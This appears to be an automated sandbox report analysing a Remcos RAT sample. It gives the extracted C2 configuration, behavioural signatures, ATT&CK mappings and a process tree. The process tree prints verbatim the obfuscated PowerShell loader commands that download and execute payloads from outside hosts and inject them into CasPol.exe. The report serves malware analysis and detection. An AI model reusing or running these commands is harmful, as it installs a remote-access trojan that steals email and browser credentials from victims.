remcos | dbb09d03e938bfdf95e1a36d363dc9efacd1ddf57e06219b44c7511109da8e46

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21-01-2025 07:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

nicepersonentiretimeimeetwellwithhershebeautiful.hta
Size

139KB
MD5

bad41547eb584b8e1abcbeecd8b0020c
SHA1

da47c40d7a590ae020a8a9ef4a2cbb0be34ce6e4
SHA256

dbb09d03e938bfdf95e1a36d363dc9efacd1ddf57e06219b44c7511109da8e46
SHA512

4ae8d7c590cc5b6ebd4f2936dadb96b6d8569f0f40810b3cf40d068d9d572240ef5f6fed31dfef13b1ca5c50893ce2f9cece1a604c295362a73d58c8b0f7cc2f
SSDEEP

768:tJnUZA+cT/RVeU2Dx6AyZ6LAuAHAUxLcUd1/KUny6yQWa1jn4FaNwkfkP0d1/KUv:t3

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

172.245.123.12:8690

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-ET2B3I
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/1728-65-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1836-60-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1248-61-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/1836-60-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1248-61-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	824	powershell.exe
6	1680	powershell.exe
7	1680	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2964	cmd.exe
824	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1680	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1680 set thread context of 292	1680	powershell.exe	37
PID 292 set thread context of 1248	292	CasPol.exe	38
PID 292 set thread context of 1836	292	CasPol.exe	39
PID 292 set thread context of 1728	292	CasPol.exe	40

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
824	powershell.exe
1680	powershell.exe
1248	CasPol.exe
1248	CasPol.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
292	CasPol.exe
292	CasPol.exe
292	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	824	powershell.exe
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeDebugPrivilege	1728	CasPol.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
292	CasPol.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 1860 wrote to memory of 2964	1860	mshta.exe	28
PID 1860 wrote to memory of 2964	1860	mshta.exe	28
PID 1860 wrote to memory of 2964	1860	mshta.exe	28
PID 1860 wrote to memory of 2964	1860	mshta.exe	28
PID 2964 wrote to memory of 824	2964	cmd.exe	30
PID 2964 wrote to memory of 824	2964	cmd.exe	30
PID 2964 wrote to memory of 824	2964	cmd.exe	30
PID 2964 wrote to memory of 824	2964	cmd.exe	30
PID 824 wrote to memory of 2748	824	powershell.exe	31
PID 824 wrote to memory of 2748	824	powershell.exe	31
PID 824 wrote to memory of 2748	824	powershell.exe	31
PID 824 wrote to memory of 2748	824	powershell.exe	31
PID 2748 wrote to memory of 2624	2748	csc.exe	32
PID 2748 wrote to memory of 2624	2748	csc.exe	32
PID 2748 wrote to memory of 2624	2748	csc.exe	32
PID 2748 wrote to memory of 2624	2748	csc.exe	32
PID 824 wrote to memory of 2620	824	powershell.exe	34
PID 824 wrote to memory of 2620	824	powershell.exe	34
PID 824 wrote to memory of 2620	824	powershell.exe	34
PID 824 wrote to memory of 2620	824	powershell.exe	34
PID 2620 wrote to memory of 1680	2620	WScript.exe	35
PID 2620 wrote to memory of 1680	2620	WScript.exe	35
PID 2620 wrote to memory of 1680	2620	WScript.exe	35
PID 2620 wrote to memory of 1680	2620	WScript.exe	35
PID 1680 wrote to memory of 292	1680	powershell.exe	37
PID 1680 wrote to memory of 292	1680	powershell.exe	37
PID 1680 wrote to memory of 292	1680	powershell.exe	37
PID 1680 wrote to memory of 292	1680	powershell.exe	37
PID 1680 wrote to memory of 292	1680	powershell.exe	37
PID 1680 wrote to memory of 292	1680	powershell.exe	37
PID 1680 wrote to memory of 292	1680	powershell.exe	37
PID 1680 wrote to memory of 292	1680	powershell.exe	37
PID 1680 wrote to memory of 292	1680	powershell.exe	37
PID 1680 wrote to memory of 292	1680	powershell.exe	37
PID 1680 wrote to memory of 292	1680	powershell.exe	37
PID 292 wrote to memory of 1248	292	CasPol.exe	38
PID 292 wrote to memory of 1248	292	CasPol.exe	38
PID 292 wrote to memory of 1248	292	CasPol.exe	38
PID 292 wrote to memory of 1248	292	CasPol.exe	38
PID 292 wrote to memory of 1248	292	CasPol.exe	38
PID 292 wrote to memory of 1836	292	CasPol.exe	39
PID 292 wrote to memory of 1836	292	CasPol.exe	39
PID 292 wrote to memory of 1836	292	CasPol.exe	39
PID 292 wrote to memory of 1836	292	CasPol.exe	39
PID 292 wrote to memory of 1836	292	CasPol.exe	39
PID 292 wrote to memory of 1728	292	CasPol.exe	40
PID 292 wrote to memory of 1728	292	CasPol.exe	40
PID 292 wrote to memory of 1728	292	CasPol.exe	40
PID 292 wrote to memory of 1728	292	CasPol.exe	40
PID 292 wrote to memory of 1728	292	CasPol.exe	40

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicepersonentiretimeimeetwellwithhershebeautiful.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1860
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c poweRsHEll.eXe -EX bYpass -NOP -w 1 -C deVIcecreDEntIAlDEpLOYMENt ; iNVoKe-exPresSIoN($(INVOkE-EXpResSIoN('[systEm.text.EncOdInG]'+[ChaR]58+[CHar]58+'UTF8.geTStRing([SYstEm.convErt]'+[ChAR]58+[CHaR]0x3a+'frOMbAsE64strINg('+[CHAR]34+'JG1nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUkRFRmluSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd5SWJTSEpLT2ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPRGpULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDeUR0R2NGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWtHVXVmUVRmcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga0ZJaHMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1NVEVwYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGbXpXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG1nOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xMzIvNzY2L25pY2ViYWJ5Z2lybGZvcm1laGF2dmUudElGIiwiJEVOVjpBUFBEQVRBXG5pY2ViYWJ5Z2lybGZvcm1laGF2dm5pY2ViYWJ5Z2lybGZvcm1laGF2LnZiUyIsMCwwKTtzdEFSdC1TbEVFUCgzKTtpbnZvS2UtRXhwUmVTc2lPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG5pY2ViYWJ5Z2lybGZvcm1laGF2dm5pY2ViYWJ5Z2lybGZvcm1laGF2LnZiUyI='+[char]0X22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2964
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poweRsHEll.eXe -EX bYpass -NOP -w 1 -C deVIcecreDEntIAlDEpLOYMENt ; iNVoKe-exPresSIoN($(INVOkE-EXpResSIoN('[systEm.text.EncOdInG]'+[ChaR]58+[CHar]58+'UTF8.geTStRing([SYstEm.convErt]'+[ChAR]58+[CHaR]0x3a+'frOMbAsE64strINg('+[CHAR]34+'JG1nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUkRFRmluSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd5SWJTSEpLT2ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPRGpULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDeUR0R2NGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWtHVXVmUVRmcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga0ZJaHMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1NVEVwYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGbXpXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG1nOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xMzIvNzY2L25pY2ViYWJ5Z2lybGZvcm1laGF2dmUudElGIiwiJEVOVjpBUFBEQVRBXG5pY2ViYWJ5Z2lybGZvcm1laGF2dm5pY2ViYWJ5Z2lybGZvcm1laGF2LnZiUyIsMCwwKTtzdEFSdC1TbEVFUCgzKTtpbnZvS2UtRXhwUmVTc2lPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG5pY2ViYWJ5Z2lybGZvcm1laGF2dm5pY2ViYWJ5Z2lybGZvcm1laGF2LnZiUyI='+[char]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:824
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r5zinrzz.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2748
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D2E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5D2D.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2624
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicebabygirlformehavvnicebabygirlformehav.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2620
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA4ADgAMwAvADQAMgAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAzADcAMQAyADQAOQA4ADAAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AZABlAG4AZQBwAHAAYQBoAHMAZwBuAGkAaAB0AGUAcgBvAG0AaAB0AGkAdwBlAGcAYQByAGUAdgBvAGMAZQByAG8AbQAvADYANgA3AC8AMgAzADEALgA4ADcAMQAuADYANAAuADgAOQAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1680
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:292
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\nppxttvjcgzjedlohyvhzuks"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1248
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ysuiumgdqorookzsyiijchfjsxh"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:1836
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\amaaueqemwjbqyvwhtuknmzsterlyh"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
0e82fa4038dd45a07d8b0c1e9b530231

SHA1
95e93ec5dbd3f81d3351a01b4dc81d7b93942a5e

SHA256
6068af68749159b3ed875fde5d45d5479cea0c39bb0327fcd210f1f5cc0e7e1e

SHA512
bebce04ea89b9e65ddc8853812a3624523112cb79471a1a4b36953beaa19513094cdcb067078bec341cd6f5bc14defbc8ccbadd64ad004da45b5ad0c7f1ac587

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5D2E.tmp

Filesize
1KB

MD5
28c0cebd13e18f86fabcb0e49a443fca

SHA1
c84277a54f49145fa0870d03db860c27204eac0c

SHA256
82bc8e98d5895884c3890145d8407b5ffc331b58be7ac4b9a4471244b719ac88

SHA512
558d89ec9b441e9e5c7a29cb4358e4d846e7779e2d829f5cb703b2b2d44b0ce66f880860c56535c96c50d0b022e75149a1a4c7e7c5a8a4a1dc1ca962280591f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\nppxttvjcgzjedlohyvhzuks

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\r5zinrzz.dll

Filesize
3KB

MD5
90490ca0b47bd5afedde85d92760d005

SHA1
ea22d8a0d873ab8d5fe401eb873831ac2a946582

SHA256
2ac870c2bff56f7f32bc79da9d487a81ceab632c10ff81326da43a2dac055189

SHA512
0b3d9849d82358efe0f7ca595fa4e72f3954a77af265d763bbc6790d696d02e07af835fdb82546d896455a2e6ba257d36a5bc733606a9480f1dcc83e35ac6445

Download Submit
C:\Users\Admin\AppData\Local\Temp\r5zinrzz.pdb

Filesize
7KB

MD5
fa4e3417381216ac6e28336b5435e82b

SHA1
303111b67cb956a3eef6e02247fcda4ad56a3342

SHA256
fa8905099e9a05052283c8c903efee1f4b9409425afe9a64d708df97ada318e2

SHA512
5bfb902622b67b6953a8faf1a9f0c3bc253e2863cac26d2c315259abc8552752494a30b37c5e5b819e4b1490b6de702b996ed920220f453c257e1c9f763a1375

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
05fac5a18d248aa9e744fde36b081048

SHA1
14cf565eadd57f0844c2188514543a66ea346775

SHA256
329eb07254e07b6e72c525b3bd5e0ade243f14439a842a37c9bbdec2337e399c

SHA512
bfe2c7a08d784c71a6e6a819e03836c2122f4fadc29f18eceaeaaa23153572c2624d53deb038d585b3b88cb13234821301faaa53a581641a4b9ef628f2043f54

Download Submit
C:\Users\Admin\AppData\Roaming\nicebabygirlformehavvnicebabygirlformehav.vbS

Filesize
229KB

MD5
743038855d008d967e70de63d3b6067b

SHA1
5fe5dfe00823ea779c43a05cf4eca254bc6b448f

SHA256
580efebb5dd99c6da0404819e716cf3af6b09bdbb7ea6782fa88a9961e3f4345

SHA512
6045292c9df58756092971d7766831df5d84ef27c08c5e2966c506aa8b85707d98289203c8a10717272f7709f197f1ae518a1724abd42ac74fba510db42a211a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC5D2D.tmp

Filesize
652B

MD5
4b4fdeb4e4435cbfbb4580c03548aaa2

SHA1
d356f7f98784e0391c0579f53c06318e4c5a2223

SHA256
67ea32b849094f80c37cb52627128c7b74d1d566074e45e00fe6fad2d1796094

SHA512
764a29088c7ddf4f5f0fcfe305d637ae5db6c004398c14217d9509cf1d75c75a549f8594ad5c0d0a80334c0e9d5ffebc6bebdc99c1a2176a56566ca2395503c4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r5zinrzz.0.cs

Filesize
490B

MD5
5333b2de1c7c92a8d581c3258a05b46d

SHA1
8ada86459f1209b2111a50084f9821a9341b4707

SHA256
7d961f8d55b6caee480f91ebae1e48ec8c17252335128364a255cc564c98f7db

SHA512
491136994067164802c4d0d0fc2626590af9849da96d7180e7bd12a1b79e86c1d9e1ca29c06b6375df4b98406ece0c01de55aa6b0bdd2736a0960edbf85d6168

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\r5zinrzz.cmdline

Filesize
309B

MD5
867de5047a19a32ce16f4a51a1060211

SHA1
c7d2316c154376300520b1b37601a871eb50ec8a

SHA256
d19666d8725d9db1ad781e929aa1bf557c401b583c03fcd9d802a4ba7cfeebda

SHA512
4d41e1bbe5e39c69c041656bb2b6efab47bd72f040b5a1e90fbdbcd80a26fef5cbf9417442570192f26c64ebc374a32b482766e007ace96e374409c7e52b2e00

Download Submit
memory/292-34-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-76-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/292-41-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-40-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/292-32-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-30-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-42-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-47-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-46-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-43-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-48-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-49-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-50-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-53-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-105-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-98-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-97-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-90-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-89-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-28-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-82-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
